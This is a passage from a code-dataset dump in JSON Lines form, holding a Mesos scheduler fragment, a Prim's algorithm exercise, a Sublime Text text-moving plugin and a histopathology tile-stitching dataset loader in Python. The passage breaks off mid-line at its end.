helloWorldScheduler = HelloWorldScheduler()\n driver = MesosSchedulerDriver(\n helloWorldScheduler,\n framework,\n \"zk://localhost:2181/mesos\" # assumes running on the master\n )\n driver.start()\n logging.info(\"Listening for Ctrl-C\")\n signal.signal(signal.SIGINT, shutdown)\n while True:\n time.sleep(5)\n sys.exit(0)\n","repo_name":"inovex/GridKA-SDDC-2015","sub_path":"Framework/exercises/docker_ports.py","file_name":"docker_ports.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"38492277821","text":"#프림 알고리즘\n# 6 11\n# 0 1 32\n# 0 2 31\n# 0 5 60\n# 0 6 51\n# 1 2 21\n# 2 4 46\n# 2 6 25\n# 3 4 34\n# 3 5 18\n# 4 5 40\n# 4 6 51\n\ndef prim():\n U = [] #빈거\n D = [1e10]* V #무한대값으로 초기화\n s = [-1]*V\n\n D[0] = 0 #시작점 선택\n while len(U) < V:\n minV = 1e10\n for i in range(V):\n if i in U:\n continue #최솟값 구하지 않음\n if minV > D[i]:\n minV = D[i]\n v = i\n\n #1 D에서 제일 작은 값인 index(v)를 찾는다.\n # U에 없는 v기준으로\n\n #2 v를 U에 넣는다\n U.append(v)\n\n #3 v하고 연결된 w의 D값을 최선으로 수정한다.\n # U에 없는 v기준으로\n for w in range(V):\n if w in U : continue\n if G[v][w]: #값이 있으면 연결돼 있는거\n D[w] = min(D[w],G[v][w])\n\n\n print(D)\n print(U)\n\n\nV,E =map(int,input().split())\nV += 1\nG = [[0]*V for _ in range(V) ]\nfor _ in range(E):\n v1,v2,w =map(int,input().split())\n G[v1][v2] = w\n G[v2][v1] = w\n\nprim()\n# print(G)\n\n#결과는 제일 작은 간선들이 나온다\n\n\n\n","repo_name":"tsmich926/ssafy_0404","sub_path":"2_prim.py","file_name":"2_prim.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"19962107906","text":"import sublime_plugin\nimport sublime\nfrom sublime import Region\n\n\ndef generic_line_regions_from_pt(view, pt):\n line = view.line(pt)\n line_string = view.substr(line)\n\n i = 0\n while i < len(line_string) and line_string[i] == ' ':\n i += 1\n\n if i < len(line_string):\n j = 0\n while j < len(line_string) and line_string[-1 - j] == ' ':\n j += 1\n assert i + j < len(line_string)\n assert line.begin() + i < line.end() - j\n source = Region(line.begin() + i, line.end() - j)\n\n else:\n j = 0\n source = None\n\n return line, source\n\n\ndef move_pt_via_sublime(view, pt, by, forward):\n assert by in ['char', 'subword', 'word', 'bigword']\n\n if by == 'char':\n return min(view.size(), pt + 1) if forward else max(0, pt - 1)\n\n if by == 'bigword':\n by = 'word'\n\n assert by in ['subword', 'word']\n\n by = by + \"_ends\" if forward else by + \"s\"\n\n regions = view.sel()\n regions_copy = list(regions)\n regions.clear()\n regions.add(Region(pt))\n\n view.run_command(\"move\", {\"forward\": forward, \"by\": by})\n\n to_return = regions[0].a\n regions.clear()\n regions.add_all(regions_copy)\n\n return to_return\n\n\nclass CutSelection():\n def __init__(self, view, edit, r, by):\n self.view = view\n self.edit = edit\n self.by = by\n\n assert self.by in ['line', 'char', 'subword', 'word', 'bigword', 'eol', 'bol']\n\n self.horizontal = self.by != 'line'\n self.vertical = not self.horizontal\n\n if r.size() == 0 and self.vertical:\n self.starter_region = view.full_line(r.a)\n self.caret_within_line = r.a - self.starter_region.begin()\n\n else:\n self.starter_region = r\n self.caret_within_line = None\n\n self.string = view.substr(self.starter_region)\n\n if not self.horizontal:\n xpos_unit = view.text_to_layout(1)[0]\n assert xpos_unit != 0\n\n if r.xpos >= 0 and not self.caret_within_line:\n self.desired_xpos = r.xpos\n self.desired_column = (r.xpos / xpos_unit)\n\n else:\n self.desired_column = view.rowcol(self.starter_region.begin())[1]\n self.desired_xpos = self.desired_column * xpos_unit\n\n print(\"self.desired_column:\", self.desired_column)\n\n self.row = self.pt = None\n\n def commit_erasure(self):\n assert self.pt is None and self.row is None\n to_return = self.starter_region\n self.view.erase(self.edit, self.starter_region)\n if self.horizontal:\n self.pt = self.starter_region.begin()\n else:\n self.row = self.view.rowcol(self.starter_region.begin())[0]\n self.starter_region = None\n return to_return\n\n def notify_of_erasure(self, r):\n assert self.pt is None and self.row is None and self.starter_region is not None\n assert r.end() <= self.starter_region.begin()\n self.starter_region = Region(self.starter_region.a - r.size(), self.starter_region.b - r.size())\n\n def midway_consistency(self):\n if self.horizontal:\n return self.pt is not None and self.row is None and self.starter_region is None\n return self.pt is None and self.row is not None and self.starter_region is None\n\n def move_vertical(self, forward, num_times=1):\n assert not self.horizontal\n assert self.midway_consistency()\n maxrow, __ = self.view.rowcol(self.view.size())\n if forward:\n self.row = min(maxrow, self.row + num_times)\n else:\n self.row = max(0, self.row - num_times)\n\n def move_horizontal(self, forward, num_times):\n assert self.horizontal\n assert self.midway_consistency()\n\n self.desired_column = None\n self.desired_xpos = None\n\n for i in range(num_times):\n if self.by in ['char', 'subword', 'word', 'bigword']:\n if len(sublime.find_resources(\"GranularSubword.py\")) > 0:\n from GranularSubword.GranularSubword import granular_move_pt\n self.pt = granular_move_pt(self.view, self.pt, self.by, forward)\n\n else:\n self.pt = move_pt_via_sublime(self.view, self.pt, self.by, forward)\n\n else:\n assert num_times == 1\n assert self.by in ['eol', 'bol']\n if self.by == 'eol':\n self.pt = self.view.line(self.pt).end()\n\n else:\n line, source = generic_line_regions_from_pt(self.view, self.pt)\n\n if source and self.pt != source.begin():\n self.pt = source.begin()\n\n else:\n self.pt = line.begin()\n\n def move(self, forward, num_times):\n if self.horizontal:\n self.move_horizontal(forward, num_times)\n\n else:\n self.move_vertical(forward, num_times)\n\n def commit_insertion(self):\n assert self.midway_consistency()\n\n if self.horizontal:\n self.view.insert(self.edit, self.pt, self.string)\n r = Region(self.pt, self.pt + len(self.string))\n self.view.sel().add(r)\n self.pt = None\n\n else:\n pt = self.view.text_point(self.row, 0)\n line = self.view.line(pt)\n\n col = min(line.size(), self.desired_column)\n pt = self.view.text_point(self.row, col)\n copy = list(self.view.sel())\n self.view.insert(self.edit, pt, self.string)\n # nuke and reload... (have to because the string insertion erases xpos values)\n self.view.sel().clear()\n self.view.sel().add_all(copy)\n r = Region(pt, pt + len(self.string), self.desired_xpos)\n if self.caret_within_line is not None:\n assert col == 0\n self.view.sel().add(Region(pt + self.caret_within_line))\n else:\n self.view.sel().add(r)\n self.row = None\n\n def notify_of_insertion(self, last_added_string):\n assert self.midway_consistency()\n if self.horizontal:\n self.pt += len(last_added_string)\n\n else:\n self.row += len([x for x in last_added_string if x == '\\n'])\n\n\ndef regions_to_cut_selections(view, edit, by):\n regions = view.sel()\n initial_cuts = []\n cuts = []\n\n for r in regions:\n initial_cuts.append(CutSelection(view, edit, r, by))\n\n regions.clear()\n\n for z in initial_cuts:\n if len(cuts) == 0 or cuts[-1].starter_region.end() <= z.starter_region.begin():\n cuts.append(z)\n\n for index, z in enumerate(cuts):\n r = z.commit_erasure()\n for w in cuts[index + 1:]:\n w.notify_of_erasure(r)\n\n return cuts\n\n\ndef grab_text(view, edit, by, forward=True, num_times=1):\n assert by in ['line', 'char', 'subword', 'word', 'bigword', 'eol', 'bol']\n\n cut_selections = regions_to_cut_selections(view, edit, by)\n\n assert len(view.sel()) == 0\n\n for c in cut_selections:\n c.move(forward, num_times)\n\n for index, c in enumerate(cut_selections):\n c.commit_insertion()\n for q in cut_selections[index + 1:]:\n q.notify_of_insertion(c.string)\n\n\nclass GranularMoveTextUp(sublime_plugin.TextCommand):\n def run(self, edit, num_times=1):\n grab_text(self.view, edit, by=\"line\", forward=False, num_times=num_times)\n\n\nclass GranularMoveTextDown(sublime_plugin.TextCommand):\n def run(self, edit, num_times=1):\n grab_text(self.view, edit, by=\"line\", forward=True, num_times=num_times)\n\n\nclass GranularMoveTextLeft(sublime_plugin.TextCommand):\n def run(self, edit, by=\"char\"):\n grab_text(self.view, edit, by=by, forward=False)\n\n\nclass GranularMoveTextRight(sublime_plugin.TextCommand):\n def run(self, edit, by=\"char\"):\n grab_text(self.view, edit, by=by, forward=True)\n\n\n# The following are convenience shortcuts:\n\n\nclass GranularMoveTextSubwordLeft(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='subword', forward=False)\n\n\nclass GranularMoveTextSubwordRight(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='subword', forward=True)\n\n\nclass GranularMoveTextToBol(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='bol')\n\n\nclass GranularMoveTextToEol(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='eol')\n\n\nclass GranularMoveTextUpTenTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=False, num_times=10)\n\n\nclass GranularMoveTextDownTenTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=True, num_times=10)\n\n\nclass GranularMoveTextUpThirtyTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=False, num_times=30)\n\n\nclass GranularMoveTextDownThirtyTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=True, num_times=30)\n\n\nclass SelectionIsEmptyOrReachesEolBol(sublime_plugin.EventListener):\n def on_query_context(self, view, key, operator, operand, match_all):\n if key != 'selection_is_empty_or_reaches_eol_bol':\n return None\n\n assert operand is True or operand is False\n\n if operator == sublime.OP_EQUAL:\n test = self.region_is_empty_or_is_full_lines\n\n elif operator == sublime.OP_NOT_EQUAL:\n test = self.region_is_not_full_lines\n\n else:\n assert False\n\n if match_all:\n return all(test(view, r) == operand for r in view.sel())\n\n else:\n return any(test(view, r) == operand for r in view.sel())\n\n def region_is_empty_or_is_full_lines(self, view, r):\n if r.a == r.b:\n return True\n\n line_a = view.full_line(r.a)\n line_b = view.full_line(r.b)\n\n if min(line_a.a, line_b.a) != r.begin():\n return False\n\n if max(line_a.a, line_b.a) != r.end():\n return False\n\n return True\n\n def region_is_not_full_lines(self, view, r):\n return not self.region_is_empty_or_is_full_lines(view, r)\n","repo_name":"youlam/GranularMoveText","sub_path":"GranularMoveText.py","file_name":"GranularMoveText.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16727848224","text":"import glob\nimport os\nimport re\nimport bisect\nimport json\nimport string\nimport pickle\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nimport lmdb\nimport torch\n\n\n#class BaseLists:\n# def file_list(self):\n #return\n\n\nclass BaseLists:\n def __init__(self, path):\n self.path = path\n\n def file_list(self):\n NotImplementedError\n\n def read_file(self, image_path):\n NotImplementedError\n\nclass PtFolders(BaseLists):\n def __init__(self, path):\n super().__init__(path)\n search_path = os.path.join(path, '**', '*.pt')\n self.pt_names = []\n for i in glob.iglob(search_path, recursive=True):\n self.pt_names.append(i)\n\n def file_list(self):\n return self.pt_names\n\n def read_file(self, pt_path):\n return torch.load(pt_path)\n\nclass JsonFolder(BaseLists):\n def __init__(self, path):\n super().__init__(path=path)\n search_path = os.path.join(path, '**', '*.json')\n self.json_names = []\n for i in glob.iglob(search_path, recursive=True):\n self.json_names.append(i)\n\n def file_list(self):\n return self.json_names\n\n def read_file(self, json_path):\n res = []\n with open(json_path, 'r') as f:\n json_data = json.load(f)\n #print(res.keys())\n #print(res['nuc']['2175'])\n #print(len(res['nuc'].keys()))\n for k, v in json_data['nuc'].items():\n #print(type(v))\n #print(v.keys())\n res.append(v)\n\n return res\n\nclass ImageFolder(BaseLists):\n def __init__(self, path):\n super().__init__(path=path)\n search_path = os.path.join(path, '**', '*.png')\n self.image_names = []\n for i in glob.iglob(search_path, recursive=True):\n self.image_names.append(i)\n\n def file_list(self):\n return self.image_names\n\n def read_file(self, image_path):\n image = cv2.imread(image_path, -1)\n return image\n\n #def image_list(self):\n # return self.image_list()\n #def read_image(self, image_path):\n # image = cv2.imread(image_path, -1)\n # return image\n\nclass LMDBFolder(BaseLists):\n def __init__(self, path):\n self.env = lmdb.open(path, map_size=1099511627776, readonly=True, lock=False)\n #with self.env.begin(write=False) as txn:\n # self.image_names= [key.decode() for key in txn.cursor().iternext(keys=True, values=False)]\n\n cache_file = '_cache_' + ''.join(c for c in path if c in string.ascii_letters)\n cache_path = os.path.join(path, cache_file)\n if os.path.isfile(cache_path):\n self.npy_names = pickle.load(open(cache_path, \"rb\"))\n else:\n with self.env.begin(write=False) as txn:\n self.npy_names = [key for key in txn.cursor().iternext(keys=True, values=False)]\n pickle.dump(self.npy_names , open(cache_path, \"wb\"))\n\n self.npy_names = [key.decode() for key in self.npy_names]\n\n def file_list(self):\n return self.npy_names\n\n def read_file(self, npy_path):\n #image = cv2.imread(image_path, -1)\n with self.env.begin(write=False) as txn:\n data = txn.get(npy_path.encode())\n data = pickle.loads(data)\n return data\n\nclass BaseDataset:\n def __init__(self, file_list, image_size):\n self.file_names = file_list.file_list()\n self.file_grids = self.construct_grids()\n self.image_size = image_size\n self.imagefp2coords = self.image_coords()\n\n assert image_size % 224 == 0\n self.border = int(image_size / 224)\n self.file_list = file_list\n #self.cum_sums = self.cal_cum_sum()\n #print(self.cum_sums)\n #self.\n #print(self.file_grids.shape)\n #self.image_clusters = self.cluster_files()\n #print(image_clusters)\n #print(len(image_clusters))\n\n #abstrct\n def image_coords(self):\n res = {}\n for k, v in self.file_grids.items():\n #print(v.shape, v)\n row, col = v.shape\n for r_idx in range(row):\n for c_idx in range(col):\n res[v[r_idx, c_idx]] = (r_idx, c_idx)\n\n return res\n\n #abstrct\n @property\n #def image_path_lists(self):\n def file_path_lists(self):\n res = []\n for k, v in self.file_grids.items():\n if self.border != 1:\n v = v[:-self.border + 1, :-self.border + 1]\n res.append(v.flatten())\n\n return np.hstack(res)\n\n # not abstrct\n def stich_files(self, files):\n NotImplementedError\n #def stich_files(self, patch):\n # row, col = patch.shape\n # h = []\n # v = []\n # for r_idx in range(row):\n # for c_idx in range(col):\n # path = patch[r_idx, c_idx]\n # image = cv2.imread(path, -1)\n # h.append(image)\n # image = np.hstack(h)\n # #print(image.shape)\n # v.append(image)\n # h = []\n # image = np.vstack(v)\n # return image\n #cv2.hstack\n\n #abstrct\n def grid_idx(self, file_grid, sample_idx):\n row, col = file_grid.shape\n row = row - self.border + 1\n col = col - self.border + 1\n r_idx = int(sample_idx / col)\n c_idx = int(sample_idx % col)\n return r_idx, c_idx\n\n #abstrct\n def get_file_by_path(self, path):\n #if path not in self.imagefp2coords:\n # r_idx, c_idx = self.imagefp2coords[os.path.basename(path)]\n #else:\n #print(self.imagefp2coords.keys())\n # print(self.imagefp2coords.keys()[3])\n r_idx, c_idx = self.imagefp2coords[path]\n base_name = os.path.basename(path)\n #print(base_name)\n image_prefix = base_name.split('_grade_')[0]\n file_grid = self.file_grids[image_prefix]\n patch = file_grid[r_idx : r_idx+self.border, c_idx : c_idx+self.border]\n #print(patch, self.stich_files)\n data = self.stich_files(patch)\n #print(data)\n return data\n\n #abstrct\n def assert_data(data):\n NotImplementedError\n\n #abstrct\n def __getitem__(self, idx):\n image_idx = bisect.bisect_right(self.cum_sum, idx)\n prefix = self.file_prefixes[image_idx]\n file_grid = self.file_grids[prefix]\n\n if image_idx == 0:\n sample_idx = idx\n else:\n sample_idx = idx - self.cum_sum[image_idx - 1]\n\n r_idx, c_idx = self.grid_idx(file_grid, sample_idx)\n patch = file_grid[r_idx : r_idx+self.border, c_idx : c_idx+self.border]\n path = file_grid[r_idx, c_idx]\n #image = self.stich_files(patch)\n output = self.stich_files(patch)\n\n self.assert_data(output)\n #assert image.shape[0] == self.image_size\n #assert image.shape[1] == self.image_size\n\n #return path, image\n return path, output\n\n #abstrct\n def __len__(self):\n return self.cum_sum[-1]\n #length = 0\n #for k, v in self.file_grids.items():\n # v1, v2 = v.shape\n # length += (v1 - self.border + 1) * (v2 - self.border + 1)\n #return int(length)\n\n #abstrct\n def cal_seq_len(self, image):\n s1, s2 = image.shape\n return int((s1 - self.border + 1) * (s2 - self.border + 1))\n\n #abstrct\n @property\n def file_prefixes(self):\n res = []\n for k, v in self.file_grids.items():\n res.append(k)\n return res\n\n #abstrct\n @property\n def cum_sum(self):\n res = []\n s = 0\n for k, v in self.file_grids.items():\n #v1, v2 = v.shape\n length = self.cal_seq_len(v)\n res.append(length + s)\n s += length\n return res\n\n #abstrct\n @property\n def cluster_files(self):\n file_prefix = dict()\n for file_name in self.file_names:\n base_name = os.path.basename(file_name)\n prefix = base_name.split('_grade_')[0]\n if prefix not in file_prefix:\n file_prefix[prefix] = []\n file_prefix[prefix].append(file_name)\n\n return file_prefix\n\n\n #abstrct\n def construct_grids(self):\n file_clusters = self.cluster_files\n #print(image_clusters)\n\n def row_col(path):\n base_name = os.path.basename(path)\n row, col = re.search(r'_row_([0-9]+)_col_([0-9]+)', path).groups()\n return int(row), int(col)\n\n for k, v in file_clusters.items():\n file_grids = []\n v = sorted(v, key=row_col)\n last_row = 0\n row = []\n for elem in v:\n r_idx, _ = row_col(elem)\n if last_row != r_idx:\n file_grids.append(np.array(row))\n last_row = r_idx\n row = []\n\n row.append(elem)\n\n file_grids.append(np.array(row))\n file_clusters[k] = np.array(file_grids)\n\n return file_clusters\n\n def prefix2image_name(self, prefix):\n \"full size\"\n v = self.file_grids[prefix]\n return v[0, 0]\n\n def whole_file(self, prefix):\n #for idx, (k, v) in enumerate(self.file_grids.items()):\n prefix = str(prefix)\n v = self.file_grids[prefix]\n return self.stich_files(v)\n\n\nclass ImageDataset(BaseDataset):\n #def stich_files\n\n def assert_data(self, image):\n assert image.shape[0] == self.image_size\n assert image.shape[1] == self.image_size\n\n def stich_files(self, patch):\n row, col = patch.shape\n h = []\n v = []\n for r_idx in range(row):\n for c_idx in range(col):\n path = patch[r_idx, c_idx]\n #image = cv2.imread(path, -1)\n image = self.file_list.read_file(path)\n h.append(image)\n image = np.hstack(h)\n v.append(image)\n h = []\n image = np.vstack(v)\n return image\n\n #not abstrct\n def vis_image(self, ori_folder, save_folder):\n #ori_folder = self.file_list.path\n for idx, (k, v) in enumerate(self.file_grids.items()):\n\n base_name = os.path.basename(k + '.png')\n src_image = cv2.imread(os.path.join(ori_folder, base_name), -1)\n\n stich_image = self.stich_files(v)\n\n assert stich_image.shape == src_image.shape\n\n image = np.hstack([stich_image, src_image])\n image = cv2.resize(image, (0, 0), fx=0.3, fy=0.3)\n\n\n cv2.imwrite(os.path.join(save_folder, base_name), image)\n\nclass LMDBDataset(BaseDataset):\n def assert_data(self, val):\n assert 'feat' in val\n assert 'coord' in val\n\n def stich_files(self, patch):\n #res = []\n node_features = []\n node_coords = []\n\n #print(patch)\n #for fp in patch.flatten():\n row, col = patch.shape[:2]\n for r_idx in range(row):\n for c_idx in range(col):\n fp = patch[r_idx, c_idx]\n nodes = self.file_list.read_file(fp)\n #print(r_idx, c_idx, len(nodes))\n #for node in nodes:\n # centeroid [x, y] # /data/by/tmp/hover_net/models/hovernet/post_proc.py process\n #node['centroid'][0] /= 2\n #node['centroid'][1] /= 2\n #print(node['centroid'])\n nodes['coord'][:, 0] += r_idx * 224 * 2\n nodes['coord'][:, 1] += c_idx * 224 * 2\n #node['bbox'][0][0]\n #node['bbox'][0][0] += r_idx * 224 * 2\n #node['bbox'][0][1] += c_idx * 224 * 2\n #node['bbox'][1][0] += r_idx * 224 * 2\n #node['bbox'][1][1] += c_idx * 224 * 2\n\n #print(node['contour'])\n #print(type(node['contour']))\n #node['contour'][:, 0] += r_idx * 224 * 2\n #node['contour'][:, 1] += c_idx * 224 * 2\n #print(node['contour'])\n #node['contour'] = [[c1 + c_idx * 224 * 2, c2 + r_idx * 224 * 2] for [c1, c2] in node['contour']]\n #print(node['contour'])\n\n #import sys; sys.exit()\n\n #node['centroid'][0] /= 2\n #node['centroid'][1] /= 2\n #print(node['centroid'])\n node_features.append(nodes['feat'])\n node_coords.append(nodes['coord'])\n #res.append(nodes)\n # with open(fp) as f:\n # data = json.load(fp)\n # for v in data['nuc'].values():\n # res.append(v)\n node_features = np.vstack(node_features)\n node_coords = np.vstack(node_coords)\n #print(res[33], 333333333)\n\n return {'feat' : node_features, 'coord' : node_coords}\n\nclass PtDataset(BaseDataset):\n def assert_data(self, data):\n assert 'feat' in data\n assert 'coord' in data\n\n def stich_files(self, patch, scale=2):\n res = {\n 'feat' : [],\n 'coord' : []\n }\n row, col = patch.shape[:2]\n for r_idx in range(row):\n for c_idx in range(col):\n fp = patch[r_idx, c_idx]\n data = self.file_list.read_file(fp)\n assert len(data['feat']) == len(data['coord'])\n feat = data['feat']\n coord = data['coord']\n if len(data['feat']) != 0:\n coord[:, 1] += c_idx * 224 * scale\n coord[:, 0] += r_idx * 224 * scale\n\n res['feat'].append(feat)\n res['coord'].append(coord)\n\n res['feat'] = torch.cat(res['feat'], dim=0)\n res['coord'] = torch.cat(res['coord'], dim=0)\n\n return res\n\n\nclass JsonDataset(BaseDataset):\n def assert_data(self, data):\n assert len(data) > 0\n assert type(data) == list\n\n def stich_files(self, patch, scale=2):\n res = []\n\n #for fp in patch.flatten():\n row, col = patch.shape[:2]\n for r_idx in range(row):\n for c_idx in range(col):\n fp = patch[r_idx, c_idx]\n nodes = self.file_list.read_file(fp)\n for node in nodes:\n # centeroid [x, y] # /data/by/tmp/hover_net/models/hovernet/post_proc.py process\n #node['centroid'][0] /= 2\n #node['centroid'][1] /= 2\n\n # unit_size = 224 * 2\n node['centroid'][0] += c_idx * 224 * scale\n node['centroid'][1] += r_idx * 224 * scale\n #node['bbox'][0][0]\n node['bbox'][0][0] += r_idx * 224 * scale\n node['bbox'][0][1] += c_idx * 224 * scale\n node['bbox'][1][0] += r_idx * 224 * scale\n node['bbox'][1][1] += c_idx * 224 * scale\n\n #node['contour'][:, 0] += r_idx * 224 * 2\n #node['contour'][:, 1] += c_idx * 224 * 2\n #print(node['contour'])\n # contour: (x,y)\n node['contour'] = [[c1 + c_idx * 224 * scale, c2 + r_idx * 224 * scale] for [c1, c2] in node['contour']]\n #print(node['contour'])\n\n #import sys; sys.exit()\n\n #node['centroid'][0] /= 2\n #node['centroid'][1] /= 2\n #print(node['centroid'])\n res.append(node)\n # with open(fp) as f:\n # data = json.load(fp)\n # for v in data['nuc'].values():\n # res.append(v)\n #print(res[33], 333333333)\n\n return res\n #for i in v:\n #print(i)\n #print(i)\n #pass\n\n #print(len(image_clusters.keys()))\n #print(type(image_clusters.values()))\n\ndef draw_nuclei(image, json_label):\n #print(json_label)\n for node in json_label:\n #print(11, node)\n cen = node['centroid']\n image = cv2.circle(image, tuple(cen), 3, (0, 200, 0), cv2.FILLED, 1)\n # print(node['centroid'], node['bbox'])\n\n # cnt = [cnt // 2 for cnt in ]\n # node['contour'] = [[c1 // 2, c2 // 2] for [c1, c2] in contour]\n # cnt = [[c1 // 2, c2 // 2] for [c1, c2] in node['contour']]\n\n # image = cv2.drawContours(image, [np.array(cnt)], -1, 255, -1)\n\n\n return image\n\n#image_folder = ImageFolder('/home/baiyu/Extended_CRC')\n#image_dataset = ImageDataset(image_folder, 224 * 3)\n#lmdb_folder = LMDBFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_lmdb/extended_crc/feat/')\n#feat_dataset = LMDBDataset(lmdb_folder, 224 * 3)\n#print(len(image_dataset))\n#print(len(feat_dataset))\n\n#import random\n#path, image = random.choice(image_dataset)\n#\n#print(path)\n#base_name = os.path.basename(path).replace('.png', '.npy')\n#lmdb_folder = '/data/smb/syh/PycharmProjects/CGC-Net/data_lmdb/extended_crc/feat/'\n#\n#image_path = Path(path)\n#sub_folder = os.path.dirname(image_path.relative_to('/home/baiyu/Extended_CRC'))\n#print(sub_folder)\n#\n#\n#npy_path = os.path.join(sub_folder, base_name)\n##print(npy_path)\n#_, res = feat_dataset.get_file_by_path(npy_path)\n#coords = res['coord']\n#for cen in coords:\n# cen = [int(c // 2) for c in cen]\n# image = cv2.circle(image, tuple(cen[::-1]), 3, (0, 200, 0), cv2.FILLED, 3)\n#\n#cv2.imwrite('/home/baiyu/HGIN/heihei_del11.png', image)\n\n\n\n#print(res)\n#s = image_dataset.file_prefixes\n#print(s[10])\n#print(path)\n#s = feat_dataset.file_prefixes\n#print(s[10])\n#s = feat_dataset.get_file_by_path\n#image_dataset.vis_image('/data/smb/数据集/结直肠/病理学/Extended_CRC/Original_Images/', 'tmp')\n#sys.exit()\n#\n##json_folder = JsonFolder('/data/by/tmp/hover_net/samples/out/fold')\n# json_folder = JsonFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_su/raw/Extended_CRC/mask/fold_1/1_normal')\n# print('ffffff')\n# json_folder = JsonFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Json/EXtended_CRC_Mask')\n# print('fffffffffff')\n# json_dataset = JsonDataset(json_folder, 1792)\n# json_path, label = json_dataset[33]\n# print(len(label), json_path)\n#\n#print(len(json_dataset))\n#print(len(image_dataset))\n#a = json_dataset[33]\n#\n#image_files = image_datasnt.file_path_lists\n#json_files = json_dataset.file_path_lists\n#\n#print('json_files', len(json_files))\n#print('image_files', len(image_files))\n#json_path = json_files[0]\n#\n#json_dir = os.path.dirname(json_path)\n#\n#\n#image_fp = image_files[1111]\n#\n#image_name = os.path.basename(image_fp)\n#\n#json_path = os.path.join(json_dir, image_name.replace('.png', '.json'))\n#\n##print(os.path.basename(json_path), os.path.basename(image_fp))\n#print(image_fp)\n#json_label = json_dataset.get_file_by_path(json_path)[1]\n##print(type(json_label), len(json_label), json_label[0], 444444, json_path)\n#image = image_dataset.get_file_by_path(image_fp)[1]\n#\n#\n#print(len(json_label))\n#image = draw_nuclei(image, json_label)\n#print('ffffffffffffffffffffffffffffff')\n##cv2.imwrite('test1_new.png', image)\n#\n#\n#\n#\n#\n#\n#\n#\n##for i in range(300):\n## image_dataset.vis_image('/data/smb/数据集/结直肠/病理学/Extended_CRC/Original_Images/', 'tmp')\n#\n#\n##image_folder = ImageFolder('test_can_be_del2/')\n##dataset = BaseDataset(image_folder, 224)\n##print(len(dataset))\n###\n##for i in range(300):\n## dataset.vis_image(i, '/data/smb/数据集/结直肠/病理学/Extended_CRC/Original_Images/', 'test_can_be_del')\n##for idx, image in enumerate(dataset):\n# #pass\n##image = dataset[2200]\n##\n##cv2.imwrite('test.png', image)\n##\n##image_names = dataset.image_names\n##print(len(image_names))\n#\n# #print(image.shape)\n# #cv2.imwrite('test_can_be_del/test{}.png'.format(idx), image)\n#\n\n\n#path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Feat_hand_crafted/0/'\n#\n#\n#\n#folder = PtFolders(path)\n#dataset = PtDataset(folder, 224 * 8)\n#print(len(dataset))\n#import random\n#path, data = random.choice(dataset)\n##data = dataset[33][1]\n##path = dataset[33][0]\n#print(path)\n# image_folder = ImageFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images')\n# img_dataset = ImageDataset(image_folder, 224 * 8)\n# res = img_dataset[33]\n# img_dataset.get_file_by_path()\n# image_path = os.path.basename(json_path).replace('.json', '.png')\n# image = img_dataset.get_file_by_path(os.path.join('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Json/EXtended_CRC_Mask', image_path))\n\n\n# print(res[1].shape, res[0])\n\n# image = res[1]\n# image = cv2.resize(image, (0, 0), fx=2, fy=2)\n# image = draw_nuclei(image, label)\n# image = cv2.resize(image, (0, 0), fx=0.5, fy=0.5)\n# cv2.imwrite('aa.jpg', image)\n#image_path = path.replace('Feat_hand_crafted', 'Images').replace('.pt', '.png').replace('0/', '')\n##print(path)\n##print(image_path)\n#\n# print(len(img_dataset), len(json_dataset))\n##image = img_dataset[33][1]\n#image = img_dataset.get_file_by_path(image_path)\n#image = cv2.resize(image, (0, 0), fx=2, fy=2)\n#\n#print(type(data), len(data))\n##image = cv2.imread(image_path)\n#print(image.shape)\n#coord = data['coord']\n#for c in coord:\n# #print(c)\n# image = cv2.circle(image, tuple(c.tolist()[::-1]), 3, (330, 0, 0), 3)\n#\n#image = cv2.resize(image, (0, 0), fx=0.3, fy=0.3)\n#cv2.imwrite('fff.jpg', image)\n##for k, v in data.items():\n## print(k, v.shape)\n#\n#\n##for k in data['coord']:\n## print(k)\n#\n#\n#\n##path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Feat_hand_crafted/0/'\n##image_path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images/'\n##\n##count = 0\n##for i in glob.iglob(os.path.join(path, '**', '*.pt'), recursive=True):\n## count += 1\n## if count != 10000:\n## continue\n## print(i)\n## dirname = os.path.dirname(i)\n## basename = os.path.basename(i)\n## dirnames = dirname.split('/')[-2:]\n## print(dirnames)\n## img_fp = os.path.join(image_path, *dirnames, basename.replace('.pt', '.png'))\n## print(img_fp)\n## image = cv2.imread(img_fp)\n##\n## image = cv2.resize(image, (0, 0), fx=2, fy=2)\n## data = torch.load(i)\n## coord = data['coord']\n## #print(coord.shape)\n## #print(coord[:, 0].shape)\n## for c in coord:\n## #print(c)\n## image = cv2.circle(image, tuple(c.tolist()[::-1]), 3, (330, 0, 0), 3)\n##\n## cv2.imwrite('fff.jpg', image)\n## break\n#\n\n\n#image_folder = ImageFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images/')\n#dataset = ImageDataset(image_folder, 1792)\n#\n##print(len(dataset))\n#image = 